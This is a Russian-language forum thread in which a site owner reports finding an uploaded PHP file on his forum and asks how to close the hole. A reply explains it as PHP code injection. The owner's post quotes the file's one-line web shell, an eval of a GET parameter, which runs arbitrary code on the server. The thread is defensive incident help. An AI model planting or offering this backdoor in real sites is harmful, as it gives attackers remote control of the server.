ART[FL] Опубликовано 23 Ноября 2012 Жалоба Поделиться Опубликовано 23 Ноября 2012 Здравствуйтесегодня получил от хостера письмо с сылкой на подозрительный файл на площадкессылка на сайт/www/forums/uploads/1.php в котором был ниже приведённый код <?eval(stripslashes($_GET[a]));?> как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работаетКак залатать дыру? в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
0 siv1987 Опубликовано 23 Ноября 2012 Жалоба Поделиться Опубликовано 23 Ноября 2012 как предотвратить появление сего взлома в будущем? Узнать каким образом посторонний код попал на форум, и закрыть уязвимость. Учитывая то, что вторая линейка давно не поддерживается, вам предстоит увлекательное занятие. что этим смог добиться взломщик Php code injection, со всеми вытекающими ведь всё на форуме работает А с чего на форуме что-то не должно работать? Во первых, сам этот код напрямую с форумом не связан, а во вторых цель взломщика наоборот остаться как можно незаметнее в системе, и "неработоспособность" у него входит в последнюю очередь. но он неотображается в панели В какой панели, и что там должно отображаться? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
ART[FL]
Здравствуйте
сегодня получил от хостера письмо с сылкой на подозрительный файл на площадке
ссылка на сайт/www/forums/uploads/1.php
в котором был ниже приведённый код
как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работает
Как залатать дыру?
в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели
Ссылка на комментарий
Поделиться на других сайтах
1 ответ на этот вопрос
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.